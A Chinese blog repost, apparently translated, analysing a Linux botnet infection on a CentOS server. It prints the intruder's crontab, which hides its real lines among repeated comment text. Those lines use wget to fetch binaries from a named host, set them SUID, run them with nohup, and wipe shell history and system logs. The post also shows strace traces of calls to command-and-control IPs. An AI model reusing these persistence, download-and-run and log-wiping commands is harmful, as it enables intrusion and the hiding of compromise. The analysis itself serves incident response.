1. 程式人生 > >基於Linux平臺下的僵屍網路病毒《比爾蓋茨》

基於Linux平臺下的僵屍網路病毒《比爾蓋茨》

image

感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~

轉載請註明出處:http://blog.csdn.net/u010484477     O(∩_∩)O謝謝

關鍵字:病毒,linux,資訊保安

我昨天寫的日誌裡面提到,家用路由器在x86的CentOS系統下奇怪的自己行動,像是在自己載入處理器。於是我決定爬上去看看,在那裡發生了什麼,然後我馬上意識到有人爬到伺服器和掛在程序中的dgnfd564sdf.com。主要是下面幾個方面atddd,cupsdd,cupsddh, ksapdd, kysapdd, skysapdd , xfsdxd等等

root      4741
0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd root 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx root 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd root 4757 0.0 0.0 41576 2268
? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd root 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd root 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd root 4767 0.0 0.0 41576 2264 ? S 21:00 0
:00 wget http://www.dgnfd564sdf.com:8080/skysapd
啟動分析

起初我摸索著看,到底是什麼讓我的電腦如此的妥協。第一件事,我想到/ etc / rc.local檢查。有如下:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
“嗯,我想從root那下手,就像這樣:
# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg 
*/1 * * * * cd /var/log > auth.log 
*/1 * * * * cd /var/log > alternatives.log 
*/1 * * * * cd /var/log > boot.log 
*/1 * * * * cd /var/log > btmp 
*/1 * * * * cd /var/log > cron 
…
…
*/1 * * * * cd /var/log > cups 
*/1 * * * * cd /var/log > daemon.log 
*/1 * * * * cd /var/log > dpkg.log 
*/1 * * * * cd /var/log > faillog 
*/1 * * * * cd /var/log > kern.log 
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog 
*/1 * * * * cd /var/log > user.log 
*/1 * * * * cd /var/log > Xorg.x.log 
*/1 * * * * cd /var/log > anaconda.log 
*/1 * * * * cd /var/log > yum.log 
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp 
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
哦。他是183кб4036大小,行。你見過183кб crontab的大小嗎?就像我所看到的這樣。

當我進入到伺服器,這些過程已經不是什麼都不做(不被處理器,沒有使用網路)。他們已經決定停止執行,恢復業務,不讓這些現有的特徵一直存在,防止被人發現。他們的strace命令就是這樣的:
[[email protected] etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 


[[email protected] etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached
在這個過程看起來他們幾乎什麼都沒做,只是偶爾進行的資料採集。當然,他們也刷了刷/ etc / rc.local crontab,這些可執行檔案(他們都有SUID位,使得他們有能力進行他們想做的事,但是他為什麼沒有刪除,也沒有改變?),只是刷了/ etc /profile
unset MAILCHECK

這意味著在計算機上的僵屍網路是大約7小時。可能實際上沒有那麼多,但不低。

現在需要檢查是否已修改任何系統檔案。在CentOS這足夠的執行:

rpm -Va
我很高興該命令輸出了和我預想一樣的東西:
[[email protected] ~]# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
.
            
           

相關推薦

no